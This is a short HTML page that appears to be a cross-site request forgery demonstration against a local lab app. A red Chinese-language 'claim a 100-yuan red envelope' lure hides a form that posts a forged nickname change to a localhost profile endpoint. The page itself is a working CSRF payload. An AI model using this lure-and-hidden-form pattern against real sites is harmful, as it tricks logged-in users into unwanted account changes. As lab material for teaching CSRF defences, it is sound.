<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>

<body style="text-align:center; margin-top:100px;">
    <h3 style="color:red;">限时福利，点击领取！</h3>
    <form action="http://127.0.0.1:8000/myapp/csrf_profile" method="POST">
        <input type="hidden" name="nickname" value="点福利中招啦">
        <button type="submit" style="padding:10px 20px; font-size:18px; background:red; color:white; border:none; border-radius:5px; cursor:pointer;">立即领取100元红包</button>
    </form>
</body>
</html>